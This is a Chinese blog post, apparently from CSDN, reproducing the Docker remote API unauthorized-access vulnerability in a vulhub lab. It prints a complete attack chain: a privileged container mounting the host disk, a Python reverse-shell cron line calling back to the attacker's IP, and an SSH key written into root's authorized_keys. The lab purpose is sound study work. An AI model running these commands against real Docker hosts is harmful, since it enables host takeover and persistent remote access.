vulhub-docker复现

已于 2022-09-29 19:12:25 修改
阅读量204 收藏 2
点赞数
分类专栏: vulhub 文章标签: web安全
于 2022-09-29 17:06:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55654781/article/details/127110244
版权

docker daemon api 未授权访问

一 描述

​ 简述Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以脱离容器拿到宿主机权限。

二 环境搭建docker-compose,vulhub

https://blog.csdn.net/weixin_52221158/article/details/125933759

vulhub:https://github.com/vulhub/vulhub

/vulhub-master/docker/unauthorized-rce# docker-compose build
/vulhub-master/docker/unauthorized-rce# docker-compose up -d

目标 ubuntu 192.168.1.242

攻击机 192.168.1.1.240

三复现

访问ip:端口

请添加图片描述

访问http://your-ip:port/version,

请添加图片描述

攻击机查看靶机docker,没有docker镜像文件

docker -H tcp://192.168.1.242:2375 ps

请添加图片描述

下载alpine镜像

docker -H tcp://192.168.1.242:2375 pull alpine

请添加图片描述

将靶机的主分区(根目录)挂载到123文件夹,这样我们就能直接访问靶机的物理目录,从而实现了docker逃逸。

docker -H tcp://192.168.1.242:2375 run -it --privileged alpine bin/sh
fdisk -l      #查看分区信息
mkdir 123
mount dev/sda5 123  #挂载

请添加图片描述

编写shell定时任务

echo "*/1 * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.240\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >>/123/etc/crontab

请添加图片描述

方法二:通过远程写入ssh公钥连接ssh

ssh-keygen -t rsa  #生成密钥
cat /root/.ssh/id_rsa.pub  查看公钥

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Is1Dd9Pu-1664442014123)(…/…/…/…/img/docker/6.png)]

docker远程写入ssh公钥

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAwzoR33Qv94K34FbYP93XhV5per/LyGpVIi5r4wec3Bd64XrH74cgddtGSiAVQyUMKqrBTmrNTPuwouha4SMd3mDvEzPR/88G3PcOs+pZ016d8dM6dDywTBkejVBnHU+zH6aZhNYKOkz13WoD539nmY8D/dS1debj8HwHd5ayqlXypFtAGaHFtCu09BoLnFxfmIUx7KLr/GwMTLhtxdRqnnv4KOJnxkq1DkyzNydwLOnYMZWukTE3IUq6afOCIbAQyvvPs70JvVHW0MKQ3wLuAjSANNmE+goCVUJ0steLU1TLgTQzGwGk1hcQrQSGJhks8JeNrYnQU8uAehC65zZ78Ppl1/CMFtUlcOP9tIBRlm8fNxtTzY1h8wQAKsmNZ4TrXkGXqb7MJYC8LL0a6i4wjupYfHE5+IIwdnFE3Uzpuk4xLOgrSRMLA4cqWbFWpy8bo5ovAIRIiz9bVyW6PZzymhSELTR5+OFYMrmbVb3z0gOwsg7ZcYPWe3I8zwZmtpM= root@kali" > /123/root/.ssh/authorized_keys

远程连接ssh

ssh root@192.168.1.242 -i id_rsa

请添加图片描述

四 参考链接

https://silentx.gitee.io/2022/08/30/docker/

人机(未转人工)
关注
专栏目录
IoT-vulhub:物联网固件防御复现环境
03-20
受项目的启发,希望做一个IoT版的固件突破复现环境。 安装 在ubuntu16.04下安装dockerdocker-compose: # 安装 pip $ curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版 docker $ curl -s ...
vlhub_fastjson1.2.45
m0_54525483的博客
02-03 4730
vlhub_fastjson1.2.451、环境搭建1.1、下载安装docker1.2、将vulhub下载到本地2、复现过程 1、环境搭建 1.1、下载安装docker 参考:https://zhuanlan.zhihu.com/p/82361096 1.2、将vulhub下载到本地 下载压缩包 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip 解压压缩包 unzip vulhub-maste
Vulhub靶场环境搭建
读书 买花 长大
02-23 2986
vulhub
常见框架漏洞复现
2401_86440467的博客
08-08 2447
使用Debian虚拟机,配置dockerdocker-compose配置后下载vulhub靶场后发现,环境还是无法启动成功,重新打开终端输入docker hub加速服务如图成功后,启动容器 ,成功若想更改端口,则vim docker-compose.yml进入更改。
Vulhub漏洞靶场搭建
dzqxwzoe的博客
06-18 5370
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Vulhub漏洞环境使用教程
Sea_Sand息禅
04-21 1万+
Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。 1、vulhub下载 下载地址:https://github.com/vulhub/vulhub 2、docker安装 apt-get install docker.io 安装后注意使用时启动docke:serv...
搭建Vulhub靶场 【附图】
热门推荐
君莫hacker的博客
09-08 2万+
目录0x01简单概述0x02安装环境1. kali设置2. 更新软件源中的所有软件列表3. 安装https协议及CA证书0x03安装步骤一、安装Docker1. 下载安装2. 查看Docker是否安装成功3. 查看docker基本信息二、安装vluhub1. 安装pip32. 安装Docker-Compose3. 查看docker-compose版本三、安装vulhub靶场1. 克隆下载2. 随便进入一个靶场环境目录3. 对靶场进行编译4. 运行此靶场5. 查看启动环境6. 通过浏览器访问7. 关闭此靶场环
vulhub的安装与简单使用
西部壮仔的博客
03-19 1万+
介绍 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 安装dockerdocker-compose后即可开始使用vulhub: 安装docker 环境: ubuntu18.04 apt install docker.io snap install docker...
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 7063
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
vulhub-master.zip
06-10
Vulhub的设计理念是简化了靶场的搭建过程,即使对Docker不熟悉的用户也能轻松上手,只需执行简单的命令,就能编译并运行起一个完整的漏洞靶场。 靶场在信息安全领域中扮演着重要的角色,它们模拟真实的漏洞环境,...
vulhub-compose.zip
01-16
一款屏蔽docker-compose的命令行工具,目的是降低火线平台社区用户使用vulhub靶场的难度,减少学习docker-compose的时间成本;同时,支持直接安装洞态IAST(原灵芝IAST)到vulhub靶场,用于漏洞复现、漏洞挖掘。 ...
基于DockerDocker-Compose的Vulhub漏洞环境设计源码
最新发布
10-02
该项目是一个基于DockerDocker-Compose构建的Vulhub漏洞环境集合源码,包含2259个文件,涵盖558个PNG图像、461个Markdown文档、286个YAML配置文件、92个Python脚本、86个Shell脚本、83个Java源代码文件、63个XML...
Docker搭建Vulhub漏洞环境
weixin_44770698的博客
08-24 4157
Docker搭建Vulhub靶场过程
【云原生】⚡手把手教你搭建集群环境⚡Linux服务器集群+Docker+Kubernetes 完整集群搭建
范同学的学习历程
10-09 4743
一、创建Linux集群环境: 1.创建虚拟机: 这里最少创建两台虚拟机,如果电脑资源充足可以创建三台+虚拟机,其中一台作为Matser主机,另外两台+作为节点主机! 如果不会创建虚拟机可以参考一下我的这篇文章:(记录了详细步骤,有任何问题可以后台私信我)【Linux】VMware安装虚拟机_故里的博客-CSDN博客 CentOS镜像文件(百度云盘): 链接:https://pan.baidu.com/s/1O7-iu4c500PpdQFr8rlmy...
radius+openldap+mysql+docker安装
weixin_47023868的博客
12-28 3690
radius+openldap+mariadb+docker安装指导 1.安装的目的 公司为了安全wifi上网,需要对接入wifi的的终端进行公司员工的账号密码认账,公司的账号密码是用域账号进行统一管理,公司目前用的交换机是华三的三成交换机,这个交换机上有自带的portal web认证和radius用户认证,为了使华三的web认证和公司的域账号可以进行关联认证,所以就使用了radius和openldap的方案 2. 使用docker安装mariadb 使用mariadb作为radius的数据存储,这里用的是
【网络安全 Kali】基于DockerVulhub安装教程指南_vulhub kali(1)
2401_84973069的博客
05-13 965
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
在 Arch Linux 上使用 Docker 运行 Mac OS - Catalina
Kearney
07-03 3107
背景介绍 MacOS默认不对其他电脑平台发布,在 Apple 目前的战略中不把 os 作为可交易的商品,而是一种卖硬件附送的高价值软件。因此对于非 A 家的设备,想要整个 Mac OS 就需要自己想办法了,黑苹果的驱动问题不太好解决 -.- 个人已经六岁的 se 想给它加点东西,奈何 xcode 不能跑在 other os,也没听说过类似 wine 的 mac wine。 查了一下黑苹果的几种办法:虚拟机(VM、VirtualBox)、双系统(单黑系统不推荐)、KVM、Docker。后两种办法见于参考前排。
vulhub weblogic ssrf复现
08-31
要在vulhub复现WebLogic的SSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了DockerDocker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值